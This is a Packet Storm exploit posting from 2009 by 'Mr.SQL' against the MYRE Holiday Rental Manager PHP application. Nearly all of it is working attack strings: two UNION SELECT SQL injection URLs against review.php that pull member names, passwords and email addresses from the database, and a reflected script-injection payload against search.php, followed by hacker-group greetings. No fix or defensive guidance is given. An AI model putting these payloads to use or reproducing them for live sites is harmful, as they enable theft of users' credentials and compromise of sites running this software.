MYRE Holiday Rental Manager SQL Injection

2009-09-10T00:00:00
ID PACKETSTORM:81132
Type packetstorm
Reporter Mr.SQL
Modified 2009-09-10T00:00:00

Description

                                        
                                            `###############################################################  
#################### Viva IslaM Viva IslaM ####################  
##  
## Remote SQL Injection Vulnerability ( review.php action )  
##  
## MYRE Holiday Rental Manager  
##  
## http://www.myrephp.com  
##  
###############################################################  
###############################################################  
##  
## AuTh0r : Mr.SQL  
##  
## H0ME : WwW.55a.NeT  
##  
## Email : SQL@Hotmail.iT  
##  
########################  
########################  
##  
## -[[: ExploiteS :]]-  
##  
## www.TraGeT.CoM/review.php?action=show_review&link_id=1+UNION+SELECT+0,0,concat_ws(0x3a3a,member_name,member_password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+members--  
## www.TraGeT.CoM/review.php?action=show_review&link_id=1+UNION+SELECT+0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+multiavailability_calendars----  
##  
## www.TraGeT.CoM/search.php?cat_id1="><script>alert()</script> << XSS  
##  
########################  
########################  
  
  
#########################################################################################################  
#########################################################################################################  
-(:: !Gr3E3E3E3E3E3E3TzZ! ::)-  
  
:: HaCkEr_EGy :: Dark MaSTer :: His0k4 :: User-Ma$keN :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS ::  
#########################################################################################################  
#########################################################################################################  
  
  
`